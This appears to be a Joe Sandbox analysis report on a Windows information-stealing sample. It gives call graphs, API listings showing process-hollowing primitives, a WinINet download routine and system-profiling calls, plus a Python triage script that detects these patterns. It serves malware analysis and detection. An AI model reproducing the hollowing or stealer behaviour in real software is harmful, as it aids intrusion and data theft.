18eaa8 22679->22694 22682 18ec80 22680->22682 22684 18ebfe StrCmpCA 22681->22684 22681->22694 23451 18e15b 22682->23451 22684->22694 22685 181cfd lstrcpyA 22685->22694 22687 1904bc lstrcpyA 22687->22694 22691 19059c 2 API calls 22691->22694 22694->22678 22694->22679 22694->22681 22694->22684 22694->22685 22694->22687 
22694->22691 22695 1905de lstrlenA lstrcpyA lstrcatA 22694->22695 22700 190562 lstrcpyA 22694->22700 22708 1904ee lstrcpyA 22694->22708 23567 18c74f 230 API calls 22694->23567 23568 18c931 231 API calls 22694->23568 23569 18d97f 226 API calls 22694->23569 22695->22694 22700->22694 22708->22694 23008->21845 23010 19d05a UnDecorator::getZName 5 API calls 23009->23010 23011 1925d6 23010->23011 23011->21063 23011->21068 23013 1904bc lstrcpyA 23012->23013 23014 182a05 23013->23014 23014->21946 23016 1904bc lstrcpyA 23015->23016 23017 182a16 23016->23017 23017->21946 23019 1904ee lstrcpyA 23018->23019 23020 196dee 23019->23020 23021 1904ee lstrcpyA 23020->23021 23022 196df9 23021->23022 23023 1904ee lstrcpyA 23022->23023 23024 196e04 23023->23024 23024->21947 23025->21946 23026->21946 23027->21946 23028->21946 23030 191711 23029->23030 23031 191682 23029->23031 23032 1904bc lstrcpyA 23030->23032 23033 1904bc lstrcpyA 23031->23033 23034 19171d 23032->23034 23035 191695 _memset 23033->23035 23036 19d05a UnDecorator::getZName 5 API calls 23034->23036 23046 1923aa lstrcpyA malloc strncpy 23035->23046 23037 19172a 23036->23037 23037->21969 23039 1916bf lstrcatA 23047 182920 23039->23047 23041 1916dc lstrcatA 23042 1916f9 23041->23042 23043 1904bc lstrcpyA 23042->23043 23044 191707 23043->23044 23044->23034 23045->21972 23046->23039 23048 182924 23047->23048 23048->23041 23050 184ac4 23049->23050 23050->23050 23051 184acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 23050->23051 23052 184b27 23051->23052 23052->21981 23054 18806a LocalAlloc 23053->23054 23055 186724 23053->23055 23054->23055 23056 18807a CryptStringToBinaryA 23054->23056 23055->22151 23055->22163 23056->23055 23057 188091 LocalFree 23056->23057 23057->23055 23058->22288 23059->22290 23061 19d05a UnDecorator::getZName 5 API calls 23060->23061 23062 190d01 23061->23062 23062->22343 23221 1a3c60 23063->23221 23066 191605 RegQueryValueExA 23067 191626 RegCloseKey CharToOemA 23066->23067 23068 
19d05a UnDecorator::getZName 5 API calls 23067->23068 23069 191657 23068->23069 23069->22357 23071 192269 23070->23071 23072 19224d K32GetModuleFileNameExA CloseHandle 23070->23072 23073 1904bc lstrcpyA 23071->23073 23072->23071 23074 192275 23073->23074 23075 19d05a UnDecorator::getZName 5 API calls 23074->23075 23076 192283 23075->23076 23076->22400 23223 190beb 23077->23223 23080 190b38 RegOpenKeyExA 23082 190b58 RegQueryValueExA 23080->23082 23083 190b70 RegCloseKey 23080->23083 23081 190b31 23081->22422 23082->23083 23083->23081 23230 1af159 23084->23230 23086 1917e8 CoInitializeEx CoInitializeSecurity CoCreateInstance 23087 191840 23086->23087 23088 191848 CoSetProxyBlanket 23087->23088 23089 191939 23087->23089 23090 191878 23088->23090 23091 1904bc lstrcpyA 23089->23091 23090->23089 23095 1918ac VariantInit 23090->23095 23092 191964 23091->23092 23093 1af1b5 5 API calls 23092->23093 23094 19196b 23093->23094 23094->22436 23096 1918cb 23095->23096 23231 19172c 23096->23231 23098 1918d6 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 23099 1904bc lstrcpyA 23098->23099 23100 19192d VariantClear 23099->23100 23100->23092 23240 1af0ed 23101->23240 23103 191978 CoInitializeEx CoInitializeSecurity CoCreateInstance 23104 1919ce 23103->23104 23105 1919d6 CoSetProxyBlanket 23104->23105 23108 191a68 23104->23108 23109 191a06 23105->23109 23106 1904bc lstrcpyA 23107 191a93 23106->23107 23107->22449 23108->23106 23109->23108 23110 191a2e VariantInit 23109->23110 23111 191a4d 23110->23111 23241 191d17 LocalAlloc CharToOemW 23111->23241 23113 191a55 23114 1904bc lstrcpyA 23113->23114 23115 191a5c VariantClear 23114->23115 23115->23107 23116->22477 23118 1904bc lstrcpyA 23117->23118 23119 1915a2 23118->23119 23119->22492 23121 1904bc lstrcpyA 23120->23121 23122 190dd7 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 23121->23122 23123 190e11 23122->23123 23131 190ec2 23122->23131 23126 190e17 GetLocaleInfoA 23123->23126 23129 1905de lstrlenA lstrcpyA lstrcatA 
23123->23129 23130 190562 lstrcpyA 23123->23130 23123->23131 23124 190eda 23127 19d05a UnDecorator::getZName 5 API calls 23124->23127 23125 190ece LocalFree 23125->23124 23126->23123 23128 190eea 23127->23128 23128->22506 23129->23123 23130->23123 23131->23124 23131->23125 23133 190d5b 23132->23133 23134 190d3f wsprintfA 23132->23134 23135 19d05a UnDecorator::getZName 5 API calls 23133->23135 23134->23133 23136 190d68 23135->23136 23136->22534 23138 190f69 RegQueryValueExA 23137->23138 23139 190f81 RegCloseKey 23137->23139 23138->23139 23139->22551 23141 191051 GetLogicalProcessorInformationEx 23140->23141 23142 19101d GetLastError 23141->23142 23143 19105c 23141->23143 23144 1910c8 23142->23144 23145 19102c 23142->23145 23244 191b30 GetProcessHeap HeapFree 23143->23244 23147 1910d2 23144->23147 23245 191b30 GetProcessHeap HeapFree 23144->23245 23153 191030 23145->23153 23154 19d05a UnDecorator::getZName 5 API calls 23147->23154 23148 191095 23148->23147 23152 19109e wsprintfA 23148->23152 23152->23147 23153->23141 23155 1910c1 23153->23155 23242 191b30 GetProcessHeap HeapFree 23153->23242 23243 191b4d GetProcessHeap HeapAlloc 23153->23243 23156 1910ec 23154->23156 23155->23147 23156->22566 23158 19d05a UnDecorator::getZName 5 API calls 23157->23158 23159 190fda 23158->23159 23159->22580 23246 191afb 23160->23246 23163 191134 wsprintfA 23165 19d05a UnDecorator::getZName 5 API calls 23163->23165 23166 191165 23165->23166 23166->22594 23168 1904bc lstrcpyA 23167->23168 23170 191188 23168->23170 23169 1911c8 23172 19d05a UnDecorator::getZName 5 API calls 23169->23172 23170->23169 23171 19051e 2 API calls 23170->23171 23171->23170 23173 1911d6 23172->23173 23173->22608 23175 1904bc lstrcpyA 23174->23175 23176 19149b CreateToolhelp32Snapshot Process32First 23175->23176 23177 191521 CloseHandle 23176->23177 23182 1914c3 23176->23182 23178 19d05a UnDecorator::getZName 5 API calls 23177->23178 23180 191536 23178->23180 23179 19150f Process32Next 23179->23177 23179->23182 
23180->22622 23181 1905de lstrlenA lstrcpyA lstrcatA 23181->23182 23182->23179 23182->23181 23183 190562 lstrcpyA 23182->23183 23183->23182 23185 1904bc lstrcpyA 23184->23185 23186 191210 RegOpenKeyExA 23185->23186 23187 19144d 23186->23187 23201 191256 23186->23201 23189 1904ee lstrcpyA 23187->23189 23188 19125c RegEnumKeyExA 23190 191299 wsprintfA RegOpenKeyExA 23188->23190 23188->23201 23191 19145e 23189->23191 23193 1912df RegQueryValueExA 23190->23193 23194 191435 RegCloseKey 23190->23194 23198 19d05a UnDecorator::getZName 5 API calls 23191->23198 23192 191433 23195 191441 RegCloseKey 23192->23195 23196 191415 RegCloseKey 23193->23196 23197 191315 lstrlenA 23193->23197 23194->23195 23195->23187 23196->23201 23197->23196 23197->23201 23199 191478 23198->23199 23199->22636 23200 190562 lstrcpyA 23200->23201 23201->23188 23201->23192 23201->23196 23201->23200 23202 191385 RegQueryValueExA 23201->23202 23203 1905de lstrlenA lstrcpyA lstrcatA 23201->23203 23202->23196 23202->23201 23203->23201 23205 196ee9 23204->23205 23206 190562 lstrcpyA 23205->23206 23207 196f06 23206->23207 23208 190562 lstrcpyA 23207->23208 23209 196f22 23208->23209 23210 190562 lstrcpyA 23209->23210 23211 196f2d 23210->23211 23212 190562 lstrcpyA 23211->23212 23213 196f38 23212->23213 23214 196f3f Sleep 23213->23214 23216 196f4f 23213->23216 23214->23213 23215 196f6b CreateThread WaitForSingleObject 23218 1904bc lstrcpyA 23215->23218 23438 196e08 23215->23438 23216->23215 23248 19cd0d 23216->23248 23220 196f93 23218->23220 23220->22655 23222 1915e1 RegOpenKeyExA 23221->23222 23222->23066 23222->23067 23226 190b7e GetProcessHeap HeapAlloc RegOpenKeyExA 23223->23226 23225 190b2d 23225->23080 23225->23081 23227 190bd8 RegCloseKey 23226->23227 23228 190bc1 RegQueryValueExA 23226->23228 23229 190be8 23227->23229 23228->23227 23229->23225 23230->23086 23239 1af0ed 23231->23239 23233 191738 CoCreateInstance 23234 191760 SysAllocString 23233->23234 23235 1917bc 23233->23235 23234->23235 23237 19176f 
23234->23237 23235->23098 23236 1917b5 SysFreeString 23236->23235 23237->23236 23238 191793 _wtoi64 SysFreeString 23237->23238 23238->23236 23239->23233 23240->23103 23241->23113 23242->23153 23243->23153 23244->23148 23245->23147 23247 191122 GlobalMemoryStatusEx 23246->23247 23247->23163 23251 19ccc5 23248->23251 23252 196f69 23251->23252 23253 19ccd4 23251->23253 23252->23215 23253->23252 23255 19c4b7 23253->23255 23256 19c4df 23255->23256 23260 19c4e9 23255->23260 23257 19d05a UnDecorator::getZName 5 API calls 23256->23257 23259 19caf0 23257->23259 23258 19c513 lstrcpyA 23258->23256 23261 19c530 23258->23261 23259->23252 23260->23256 23260->23258 23262 19c5a0 23261->23262 23390 19b8b5 9 API calls 23261->23390 23264 19c5c1 23262->23264 23265 19c5b2 23262->23265 23266 19c5d6 23264->23266 23267 19c5c6 23264->23267 23391 19bf8c 20 API calls 23265->23391 23270 19c5eb 23266->23270 23271 19c5db 23266->23271 23392 19c00b 18 API calls UnDecorator::getZName 23267->23392 23270->23256 23275 19c5f4 23270->23275 23393 19c12e 8 API calls UnDecorator::getZName 23271->23393 23272 19c5bf 23273 19c5f9 23272->23273 23273->23256 23277 19c603 lstrcpyA lstrcpyA lstrlenA 23273->23277 23394 19c1f1 8 API calls UnDecorator::getZName 23275->23394 23278 19c65b lstrcpyA 23277->23278 23279 19c643 lstrcatA 23277->23279 23280 19c6c4 23278->23280 23279->23278 23318 19ae98 23280->23318 23404 19bdc5 malloc WriteFile _memmove 23318->23404 23320 19aeb0 23405 19bdc5 malloc WriteFile _memmove 23320->23405 23322 19aec0 23406 19bdc5 malloc WriteFile _memmove 23322->23406 23324 19aed0 23407 19bdc5 malloc WriteFile _memmove 23324->23407 23326 19aee0 23408 19bdc5 malloc WriteFile _memmove 23326->23408 23328 19aef2 23409 19bdc5 malloc WriteFile _memmove 23328->23409 23330 19af04 23410 19bdc5 malloc WriteFile _memmove 23330->23410 23332 19af16 23411 19bdc5 malloc WriteFile _memmove 23332->23411 23334 19af28 23412 19bdc5 malloc WriteFile _memmove 23334->23412 23390->23262 23391->23272 23392->23272 
23393->23272 23394->23273 23404->23320 23405->23322 23406->23324 23407->23326 23408->23328 23409->23330 23410->23332 23411->23334 23447 1af0ed 23438->23447 23440 196e14 lstrlenA 23444 196e30 23440->23444 23446 196e25 23440->23446 23441 1904ee lstrcpyA 23441->23444 23442 185482 45 API calls 23442->23444 23443 190562 lstrcpyA 23443->23444 23444->23441 23444->23442 23444->23443 23445 196e96 StrCmpCA 23444->23445 23445->23444 23445->23446 23447->23440 23573 187eae 11 API calls 23448->23573 23450 187efc 23450->22694 23452 18e191 _memset 23451->23452 23453 18e1d3 RegOpenKeyExA 23452->23453 23567->22694 23568->22694 23569->22694 23573->23450

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
• Opcode ID: 4685673c820f8ec91281c2c6641cbe7f8e306c48c5723cc202be16ab764c7e93
• Instruction ID: 42f985cebdb11a272353ec225a7db4ce3590d6c2a65c98ec4f7bb5b5c190067c
• Opcode Fuzzy Hash: 4685673c820f8ec91281c2c6641cbe7f8e306c48c5723cc202be16ab764c7e93
                                                                                                                                                                        • Instruction Fuzzy Hash: C052B579903222AFDB037FA6FD499243FBEF758301B11992BE9058A270D7724864EF15

                                                                                                                                                                         Control-flow Graph (rendered graph not reproduced; the executed / not-executed colouring does not survive extraction)
                                                                                                                                                                         • Basic blocks 19c4b7 through 19cadc; most failure branches converge on the block at 19cae3, which calls 19d05a.
                                                                                                                                                                         • Imported APIs along the graph: lstrcpyA (19c513, 19c603, 19c65b), lstrlenA (19c603), lstrcatA (19c643), GetDesktopWindow, GetTickCount and srand (19c88c), rand in a self-looping block (19c8a6), malloc twice around a call to 1a70a0 (19ca78).
                                                                                                                                                                         • Internal calls: 19d05a, 19b8b5, 19bf8c, 19c00b, 19c12e, 19c1f1, 19ae98, 19c331, 19b834, 19b892, 19bdc5, 19c372, 19c45f, 19b0fa, 19bea5, 1a70a0.
                                                                                                                                                                         • The GetTickCount, srand, rand sequence seeds the C runtime PRNG from the tick count and then draws from it in a loop: a non-cryptographic source of variation, whose consumer is not visible in this graph.
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: the same memory dump regions as listed for the preceding function (identical list, 00000000.00000002.2042664621.0000000000180000 through 00000000.00000002.2043302767.00000000003F0000)
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: /$UT
                                                                                                                                                                        • API String ID: 0-1626504983
                                                                                                                                                                        • Opcode ID: 5bc8ff4d2c34b9de923b56164b00ac28b9c17f41d1efbfddb37095e893a9d2ff
                                                                                                                                                                        • Instruction ID: a7226390a6842c1c0e83670121a07a6c2c0a205d6424fa36f838eb8badd71a93
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bc8ff4d2c34b9de923b56164b00ac28b9c17f41d1efbfddb37095e893a9d2ff
                                                                                                                                                                        • Instruction Fuzzy Hash: C20291B1E042688FDF25CF68C8807AEBBB5AF55304F0540E9D989AB246D7309E85CFD5

                                                                                                                                                                         Control-flow Graph (rendered graph not reproduced; the executed / not-executed colouring does not survive extraction)
                                                                                                                                                                         • Basic blocks 186963 through 186bb0. Main path: calls to 1904ee, 184ab6 and 1904bc, then InternetOpenA and StrCmpCA (entry block), InternetConnectA (1869f6), HttpOpenRequestA (186a22), a conditional InternetSetOptionA (186a67), HttpSendRequestA and HttpQueryInfoA (186a83), call 191ad2 (186acb), then an InternetReadFile loop (186b2b) whose body at 186af6 calls 1905de, 190562 and 182920 for each chunk.
                                                                                                                                                                         • Exit path: three InternetCloseHandle calls (186b4a, 186b56, 186b62), call 1904ee (186b6e), then 182920 three times and 19d05a (186b7f). Failures of InternetConnectA and HttpOpenRequestA jump directly to the matching close-handle block.
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001869C5
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 001869DF
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186A0E
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00186A4D
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186A7D
                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186A88
                                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00186AAC
                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00186B40
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186B50
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186B5C
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186B68
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
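The two listings above fit together as a triage signal: the resolver at 19c4b7 fetches, by name, the six APIs needed for process hollowing (CreateProcessA, GetThreadContext, SetThreadContext, VirtualAllocEx, WriteProcessMemory, ResumeThread), and the routine at 186963 is a plain WinINet GET-and-read chain that sets INTERNET_OPTION_SECURITY_FLAGS (option 0x1F) before sending and checks HTTP_QUERY_STATUS_CODE (0x13) afterwards. The script below is an added example, not part of the report or of Joe Sandbox: it parses API lines in the format shown above (the line grammar is inferred from those lines), decodes the wininet.h constants whose values are documented, and applies both rules to a constructed input copied from the listings. One assumption is marked in the code: the third InternetSetOptionA argument (00010300) is treated as the pointed-to DWORD rather than the lpBuffer address, and only the documented SECURITY_FLAG_* bits are named; the remaining bit is reported as undecoded rather than guessed.

```python
"""Triage helper for Joe Sandbox "APIs" listings (added example, not the
report's or Joe Sandbox's own code)."""
import re

API_LINE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[^.(\s]+)\.(?P<mod>[A-Z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
HEX_ARG = re.compile(r"^-?[0-9A-F]+$")

# Documented wininet.h values.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F   # option in the InternetSetOptionA call above
HTTP_QUERY_STATUS_CODE = 0x13           # info level in the HttpQueryInfoA call above
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
DOWNLOAD_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                  "HttpSendRequestA", "InternetReadFile"]
HOLLOWING_SET = {"CreateProcessA", "GetThreadContext", "SetThreadContext",
                 "VirtualAllocEx", "WriteProcessMemory", "ResumeThread"}

# Constructed input: lines copied from the listing for the routine at 186963,
# plus one "Part of subcall" line to show it is parsed but excluded from this
# routine's own call order (its ref lies inside the callee).
SAMPLE_LINES = """
  • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001869C5
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186A0E
• HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00186A4D
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186A7D
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186A88
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00186AAC
• InternetReadFile.WININET(?,?,000007CF,?), ref: 00186B40
• InternetCloseHandle.WININET(?), ref: 00186B50
"""
# The String ID list of the resolver function at 19c4b7, as shown in the report.
SAMPLE_RESOLVED = ("CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$"
                   "ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$"
                   "VirtualAllocEx$WriteProcessMemory$dbghelp.dll").split("$")


def parse_arg(tok):
    """'00000013' -> 0x13; '-00400100' -> its 32-bit two's complement;
    '?' (unknown at trace time) -> None; anything else (the literal GET) stays a str."""
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX_ARG.match(tok):
        v = int(tok.lstrip("-"), 16)
        return (-v) & 0xFFFFFFFF if tok.startswith("-") else v
    return tok


def parse_api_lines(text):
    """Return [(ref, api, module, args, from_subcall)] in report order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m.group("args").split(",")] if m.group("args") else []
        calls.append((int(m.group("ref"), 16), m.group("api"), m.group("mod"),
                      args, m.group("sub") is not None))
    return calls


def decode_security_flags(value):
    """Name the documented bits; report anything else as an undecoded remainder."""
    names = [n for bit, n in SECURITY_FLAGS.items() if value & bit]
    rest = value & ~sum(SECURITY_FLAGS) & 0xFFFFFFFF
    if rest:
        names.append("0x%08X (not decoded)" % rest)
    return names


def triage(text, resolved_names=()):
    """Apply both rules and decode the arguments worth looking at."""
    first = {}                      # first direct call per API, by address
    for ref, api, _, args, sub in sorted(parse_api_lines(text)):
        if not sub:
            first.setdefault(api, (ref, args))
    findings = {}
    refs = [first[a][0] for a in DOWNLOAD_CHAIN if a in first]
    # Rule 1: all five WinINet calls present and in ascending address order.
    findings["wininet_download_chain"] = (len(refs) == len(DOWNLOAD_CHAIN) and refs == sorted(refs))
    if "InternetSetOptionA" in first:
        _, args = first["InternetSetOptionA"]
        # Assumption: the report shows the pointed-to DWORD (0x10300), not the
        # lpBuffer address. A 4-byte INTERNET_OPTION_SECURITY_FLAGS write before
        # HttpSendRequestA is how a client relaxes certificate validation.
        if len(args) >= 4 and args[1] == INTERNET_OPTION_SECURITY_FLAGS and args[3] == 4:
            findings["tls_validation_relaxed"] = decode_security_flags(args[2])
    if "HttpQueryInfoA" in first:
        findings["checks_http_status"] = first["HttpQueryInfoA"][1][1] == HTTP_QUERY_STATUS_CODE
    if "InternetReadFile" in first:
        findings["read_chunk_size"] = first["InternetReadFile"][1][2]
    # Rule 2: every primitive needed for process hollowing is resolved by name.
    findings["hollowing_api_set_complete"] = HOLLOWING_SET <= set(resolved_names)
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES, SAMPLE_RESOLVED).items():
        print(key, value)
```

Run against the constructed input, the chain rule fires (the five refs 1869C5, 186A0E, 186A4D, 186A88, 186B40 are in program order), the security-flags value decodes to SECURITY_FLAG_IGNORE_UNKNOWN_CA and SECURITY_FLAG_IGNORE_WRONG_USAGE plus an undecoded 0x00010000 bit, the read buffer is 0x7CF bytes, and the hollowing set is complete. "Part of subcall" lines belong to callees, so they are parsed but kept out of the ordering check; feeding a whole report's API sections through this without that distinction would produce false chain matches across functions.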
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: the same memory dump regions as listed for the preceding function (identical list, 00000000.00000002.2042664621.0000000000180000 through 00000000.00000002.2043302767.00000000003F0000)
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                        • String ID: ERROR$ERROR$GET
                                                                                                                                                                        • API String ID: 3863758870-2509457195
                                                                                                                                                                        • Opcode ID: 5323fac8edf1b1ef04e08562dc8c26c14760d4b9aa2df3705fc2c7d8a52e5a77
                                                                                                                                                                        • Instruction ID: 73f09b6b2d0cb30233afd7182b355e27675f5699adc1fccbdfeb8c14d2cae55d
                                                                                                                                                                        • Opcode Fuzzy Hash: 5323fac8edf1b1ef04e08562dc8c26c14760d4b9aa2df3705fc2c7d8a52e5a77
                                                                                                                                                                        • Instruction Fuzzy Hash: 46513B71A01169AFDF22BB60DC85AEEBBBCFB04344F0081A6F549A7151DB305E859F90

Control-flow Graph
• Block 2332: 19196c-1919d0 (call 1af0ed, CoInitializeEx, CoInitializeSecurity, CoCreateInstance) -> 2336, 2337
• Block 2336: 191a75-191a7a -> 2338
• Block 2337: 1919d6-191a02 (CoSetProxyBlanket) -> 2339
• Block 2338: 191a8e (call 1904bc) -> 2343
• Block 2339: 191a06-191a08 -> 2341, 2342
• Block 2341: 191a0a-191a15 -> 2344, 2345
• Block 2342: 191a6e-191a73 -> 2338
• Block 2343: 191a93-191a9a (call 1af192)
• Block 2344: 191a68-191a89 -> 2338
• Block 2345: 191a17-191a2c -> 2344, 2350
• Block 2350: 191a2e-191a66 (VariantInit, call 191d17, call 1904bc, VariantClear) -> 2343
APIs
• __EH_prolog3_catch.LIBCMT ref: 00191973
• CoInitializeEx.OLE32(00000000,00000000,00000030,00193FA7,?,AV: ,001B68CC,Install Date: ,001B68B8,00000000,Windows: ,001B68A8,Work Dir: In memory,001B6890), ref: 00191982
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00191993
• CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 001919AD
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001919E3
• VariantInit.OLEAUT32(?), ref: 00191A32
  • Part of subcall function 00191D17: LocalAlloc.KERNEL32(00000040,00000005,?,?,00191A55,?), ref: 00191D1F
  • Part of subcall function 00191D17: CharToOemW.USER32(?,00000000), ref: 00191D2B
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
• VariantClear.OLEAUT32(?), ref: 00191A60
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
